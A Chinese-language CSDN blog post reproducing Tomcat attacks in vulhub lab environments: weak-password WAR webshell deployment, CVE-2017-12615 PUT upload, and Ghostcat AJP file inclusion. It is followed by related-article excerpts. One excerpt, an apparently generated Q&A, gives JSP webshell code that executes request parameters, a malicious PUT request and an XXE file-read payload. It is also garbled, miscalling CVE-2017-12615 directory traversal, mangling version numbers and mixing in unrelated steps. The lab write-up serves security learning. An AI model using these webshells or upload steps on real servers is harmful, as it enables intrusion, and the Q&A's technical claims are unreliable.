漏洞复现Tomcat系列弱口令、CVE-2017-12615、CVE-2020-1938

已于 2023-07-06 10:05:05 修改
阅读量1.3k 收藏
点赞数 2
分类专栏: 漏洞复现:网络安全的实验室 文章标签: tomcat java
于 2023-07-04 16:15:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47289634/article/details/131535684
版权

文章目录

提提神

在这里插入图片描述

tomcat8 弱口令

介绍:

Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。如果可以利用弱口令进去的,可直接getshell

复现:

vulhub搭建环境
在这里插入图片描述
访问靶场地址,使用tomcat/tomcat弱口令登录后台
在这里插入图片描述
制作webshell.war
在这里插入图片描述
上传shell.war,访问试一下并用冰蝎连接试一下
在这里插入图片描述
成功拿到shell权限
在这里插入图片描述

Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)

介绍:

Apache Tomcat 7.0.0版本至7.0.79版本存在远程代码执行漏洞。当 Tomcat 运行在 Windows 或Linux主机上,由于配置不当(非默认配置),将配置文件conf/web.xml中的readonly设置为了 false,导致可以使用PUT方法上传任意文件,虽然限制了jsp后缀的上传,攻击者仍有可能可通过构造的攻击请求向服务器上传包含任意代码的 JSP 文件。

复现:

使用vulhub搭建漏洞环境

cd vulhub/tomcat/CVE-2017-12615/
docker-compose up -d

进入容器,查看配置

docker exec -it a4a57be8f0e9 /bin/bash
cat conf/web.xml | grep readonly

在这里插入图片描述

访问漏洞环境
在这里插入图片描述
抓包,修改请求方式get改为PUT,并写入webshell
在这里插入图片描述
冰蝎连接成功,拿下
在这里插入图片描述

Tomcat AJP 文件包含漏洞(CVE-2020-1938)

介绍:

Ghostcat(幽灵猫) 是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。

Apache Tomcat 使用AJP协议通信过程中存在文件包含漏洞,由于AJP协议设计存在缺陷内部相关的属性可控,攻击者可以构造属性值,实现漏洞的利用,成功利用这些漏洞可导致获得敏感文件信息,甚至可以进行远程代码执行漏洞利用。

复现:

使用vulhub搭建环境

cd vulhub/tomcat/CVE-2017-12615/
docker-compose up -d

访问靶机
在这里插入图片描述
对目标地址进行端口扫描,发现开发8080,8009端口
在这里插入图片描述
漏洞利用
使用前需上传一个jsp内容的文件,后缀可以任意,如4.png
URL输入如ajp://1.1.1.1:8009/abcd.jsp或1.1.1.1:8009/abcd.jsp
URI资源可任意写,后缀为jsp才会使用JspServlet解析,否则使用DefaultServlet只有文件读取功能
然后cmd输入上传文件基于根目录的相对路径即可包含执行。
需要注意的是只能上传至web根路径以及子目录下,无法跨出web根目录,根目录如webapps。

利用成功
在这里插入图片描述

青衫木马牛
关注
专栏目录
Apache Tomcat漏洞复现
m0_56578216的博客
09-07 1255
来到vulhub/tomcat/tomcat8/靶场。
CVE-2023-37569(未授权任意文件上传+弱口令爆破)
最新发布
Battery的博客
06-11 5万+
Online Piggery Management System v1.0 - 存在未授权的文件上传漏洞,登陆界面弱口令爆破。
Weblogic弱口令CVE-2020-14882漏洞分析
m0_61506558的博客
09-22 682
未经身份验证的远程攻击者可能通过构造特殊的HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。
PostgreSQL从弱口令到RCE(CVE-2019-9193)
网络安全。
01-29 3111
0x01 简介 PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 0x02 影响版本 postgresql 9.3-11 0x03 漏洞复现 1、使用“超级弱口令”爆破处postgresql数据库账号密码。 2、使用“Navicat Premium”连接postgres...
Tomcat漏洞复现CVE-2017-12615&CVE-2020-1938&弱口令
m0_58596609的博客
01-10 1213
Tomcat漏洞复现CVE-2017-12615&CVE-2020-1938&弱口令
Tomcat漏洞复现CVE-2020-1938文件包含漏洞+Tomcat8+弱口令&&后台getshell漏洞+CVE_2017_12615远程代码执行漏洞
serendipity1130的博客
09-01 1万+
CVE-2020-1938 Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp配置文件或源代码等。 tomcat默认的conf/server.xml中配置了2个Connector,一个为8080的对外提供的HTTP协议端口,另外一个就是默认的8009 AJP协议端口,两个端口默认均监听在外网ip。 1.使用nmap对靶机进行扫描,查看8009端口是否处
Weblogic漏洞 - Weblogic 弱口令漏洞
HAKUNAMATATATTA的博客
12-02 2300
WebLogic Server 是美国甲骨文( Oracle )公司开发的一款适用于云环境和传统环境的应用服务中间件,确切的说是一个基于 JavaEE 架构的中间件,它提供了一个现代轻型开发平台,用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的 Java 应用服务器。将Java 的动态功能和 Java Enterprise 标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现
ran的博客
05-13 2790
ISS中间件(Internet Security and Acceleration Server Middleware)是微软公司推出的一种安全中间件,旨在提供高效的安全代理服务和网络加速功能。它是Microsoft Proxy Server和Microsoft Firewall产品的继承者,也是Microsoft Forefront TMG(Threat Management Gateway)的前身。
Tomcat漏洞—(CVE-2017-12615)和后台部署war文件
今天也要加油鸭
03-26 2847
文章目录一、远程代码执行漏洞CVE-2017-12615)二、信息泄露漏洞CVE-2017-12616)三、弱口令➕后台部署war文件 Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱...
漏洞复现】---- ActiveMQ 反序列化漏洞CVE-2015-5254)
qq_43168364的博客
09-04 704
一、简介 Apache ActiveMQ是老外所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。攻击者可以借助特制的序列化的java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 漏洞影响的版本为:Apache ActiveMQ 5.13.0之前的版本。 二、漏洞环境准备 pull下来内容 环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递
Apache APISIX Dashboard(CVE-2022-24112)命令执行漏洞方式利用
include_voidmain的博客
04-11 7850
0x01 什么是Apache APISIX Dashboard Apache APISIX 是一个动态、实时、高性能的开源 API 网关,提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX 可以帮助企业快速、安全地处理 API 和微服务流量,包括网关、Kubernetes Ingress 和服务网格等。 0x02 漏洞详情 漏洞编号:CVE-2022-24112 影响版本:Apache APISIX < 2.12.1 Apache APIS
2022 弱口令安全实验室招新赛-靶机挑战记录
qq_42077227的博客
11-16 2791
2022 弱口令安全实验室招新赛-靶机挑战记录
CVE-2016-3088】 Activemq文件上传以及弱口令
Lazy_ass的博客
11-25 6640
CVE-2016-3088 PUT方法上传文件(自建环境) 漏洞描述: Apache ActiveMQ是美国阿帕奇(Apache)软件基金会的一套开源的消息中间件 Apache ActiveMQ 5.14.0之前5.x版本的Fileserver Web应用中存在安全漏洞。远程攻击者可通过发送HTTP PUT和HTTP MOVE请求利用该漏洞上传并执行任意文件 漏洞复现流程 1: 首先需要判断/fileserver目录是否具有访问权限 2: 访问/admin/test/systemProperties.js
【jenkins漏洞复现CVE-2017-1000353远程代码执行漏洞+CVE-2018-1000861未授权弱口令用户可执行任意命令
serendipity1130的博客
08-31 964
CVE-2017-1000353 1.扫描开放了8080端口,访问8080端口: 2、执行下面命令,生成字节码文件: java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success" 3、执行上述代码后,生成jenkins_poc.ser文件,这就是序列化字符串,#"touch..."是待执行的任意命令 4、修改exploit.py,把proxies里面的内容注释掉 6、执行如下
使用 Metasploit 渗透局域网 Windows 设备
还没想好昵称的新建p的博客
12-01 1283
本文讲述了如何使用 Metasploit 渗透局域网 Windows 设备。
Tomcat漏洞(弱口令war包)详解
xinyue9966的博客
02-17 4953
后台弱口令上传war包 影响版本:Tomcat版本:7.0–>8.0 影响说明:后台弱口令登录,上传webshell 环境说明:PHP5.5.38 、 Apache2.4.10、Tomcat 8.0.43 环境搭建 东塔靶场 漏洞原理 tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。 tomcat是一个中间件,在B/S架构中,浏览器发出的http请求经过tpmcat中间件,转发到最终的目的服务器上
应用安全-软件安全-漏洞CVE整理
weixin_30872157的博客
07-01 643
HFS(文件共享) HFS远程命令执行 phpmyadmin(mysql数据库管理工具) phpmyadmin弱密码 phpmoadmin(mongoDB管理工具 ) phpmoadmin远程代码执行Elasticsearch(搜索服务器) elasticsearch远程命令执行 Elasticsearch未授权访问漏洞 Elasticsearch任意文件读取 "受...
【web漏洞弱口令
qq_21193587的博客
06-04 4万+
弱口令 漏洞介绍 弱口令也是安全漏洞的一种,是指系统登录口令的设置强度不高,容易被攻击者猜到或 破解。造成弱口令的主要原因是系统的运维人员、管理人员安全意识不足。常见的弱口令形 式包括:系统出厂默认口令没有修改;密码设置过于简单,如口令长度不足,单一使用字母 或数字;使用了生日、姓名、电话号码、身份证号码等比较容易被攻击者猜到的信息设置口 令;设置的口令属于流行口令库中的流行口令。 漏洞危害 绝大多数企业有一定用户数,对安全密码复杂对没有安全基准或落实不到位,都会存在弱密码,会看似符合密码复杂度要求的密码,
Apache Tomcat漏洞CVE-2017-12617
KingXai的专栏
12-13 8684
Apache Tomcat中发现的CVE-2017-12617严重远程代码执行(RCE)漏洞影响启用了HTTP PUT的系统(通过将默认servlet的“只读”初始化参数设置为“false”)受到影响。如果默认servlet的参数只读设置为false,或者配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的Tomcat版本在所有操作系统上包含潜在危险的
cve-2017-12615漏洞复现
06-28
### 回答1: cve-2017-12615漏洞是Apache Tomcat服务器中的一个远程代码执行漏洞。攻击者可以通过发送特定的HTTP请求来利用该漏洞,从而在服务器上执行任意代码。 要复现漏洞,需要满足以下条件: 1. 目标服务器上运行的是Apache Tomcat 7..至7..79版本或8.5.至8.5.16版本。 2. 目标服务器上存在一个Web应用程序,其中包含一个可上传文件的Servlet。 3. 目标服务器上的Web应用程序未正确配置,允许攻击者上传包含恶意代码的JSP文件。 攻击者可以通过发送以下HTTP请求来利用该漏洞: PUT /test.jsp/ HTTP/1.1 Host: target.com Connection: close Content-Length: 100 <% out.println("Hello, world!"); %> 其中,test.jsp是攻击者上传的包含恶意代码的JSP文件。攻击者还需要在请求中包含一个特殊的Content-Type头,以触发漏洞。 如果攻击成功,攻击者就可以在目标服务器上执行任意代码,包括获取敏感信息、修改数据或者控制整个服务器。因此,建议管理员及时升级Apache Tomcat服务器,或者对Web应用程序进行正确的配置和安全审计。 ### 回答2: CVE-2017-12615漏洞是Apache Tomcat中的一个目录遍历漏洞,它使得攻击者能够通过发送特定的HTTP请求,获取Tomcat服务器上应用程序的敏感信息。这种漏洞的原因是Tomcat默认启用了WebDAV(Web Distributed Authoring and Versioning)服务,攻击者可以发送特定的HTTP PUT请求利用该漏洞向服务器发送恶意的WAR文件,并且可以通过使用Windows UNC路径造成RCE漏洞。 下面是CVE-2017-12615漏洞复现步骤: 1.安装Tomcat服务器 2.根据Tomcat的版本,下载特定的利用工具(e.g.,ysoserial.jar 或者wmx.jar)。 3.使用ysoserial.jar或者wmx.jar(如图所示)创建一个恶意文件,并通过PUT请求将它上传到目标服务器。 4.在表单中输入如下内容: PUT /test.txt/WEB-INF/web.xml HTTP/1.1 Host: [Tomcat address]:[listening port] User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/xml Content-Length: 284 <?xml version="1.0"?> <!DOCTYPE x [ <!ELEMENT x ANY> <!ENTITY % p1 SYSTEM "file:///c:/windows/system32/test.bat"> <!ENTITY % p2 "<!ENTITY p3 '′%p1;%p1;′'>"> %p2;%p3; ]> 5.从服务器上获取war文件并进行反序列化,验证漏洞是否真实存在。 6.如果漏洞存在,则攻击者可以使用该漏洞获取Tomcat服务器上应用程序的敏感信息,并且可以在服务器上执行任意命令。 为了缓解该漏洞产生的风险,我们可以通过禁用WebDAV服务、运行Tomcat服务器以非特权用户身份、 对上传文件类型进行限制, 或者升级最新的Tomcat版本等方式来解决该漏洞。 ### 回答3: CVE-2017-12615 是 Apache Tomcat 中的一个远程代码执行漏洞。该漏洞存在于 Tomcat 7.0.0 到 7.0.79 版本和 Tomcat 8.5.0 到 8.5.16 版本中。攻击者可以利用该漏洞通过 HTTP 协议上传恶意 JSP 文件并执行任意命令。 为了演示该漏洞复现,我们需要先搭建一个虚拟机环境来运行 Apache Tomcat。在这里,我们以 Ubuntu 16.04.6 LTS 作为漏洞环境的操作系统。 安装 Apache Tomcat 首先,我们需要安装 Apache Tomcat。在终端窗口中执行以下命令: sudo apt-get update sudo apt-get install tomcat7 安装完成后,我们可以通过访问以下 URL 来确认 Tomcat 是否成功安装: http://localhost:8080/ 如果可以看到 Tomcat 的欢迎页面,则说明安装成功。 复现漏洞 接下来,我们需要复现 CVE-2017-12615 漏洞。步骤如下: 1. 创建一个名为 test.jsp 的 JSP 文件,该文件包含以下代码: <% if ("POST".equals(request.getMethod())) { Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream())); String line; while ((line = in.readLine()) != null) { out.println(line); } in.close(); } %> 2. 通过以下命令创建一个名为 test.war 的 Web 应用程序文件: jar -cvf test.war test.jsp 3. 接下来,我们需要在 Tomcat 的 webapps 目录下创建一个名为 test 目录。接着,将上传的 test.war 文件复制到该目录下: sudo mkdir /var/lib/tomcat7/webapps/test sudo mv test.war /var/lib/tomcat7/webapps/test/ 4. 通过以下 URL 访问 test.jsp 文件,可以发现该页面中含有一个命令执行的输入框: http://localhost:8080/test/test.jsp 5. 在输入框中输入以下命令,即可执行该命令并返回结果: cmd=ls 我们可以看到,这个漏洞可以允许攻击者上传包含恶意代码的 JSP 文件并执行恶意命令,扰乱服务器系统。因此,我们需要对 Apache Tomcat 应用程序服务器进行及时修复。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

青衫木马牛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值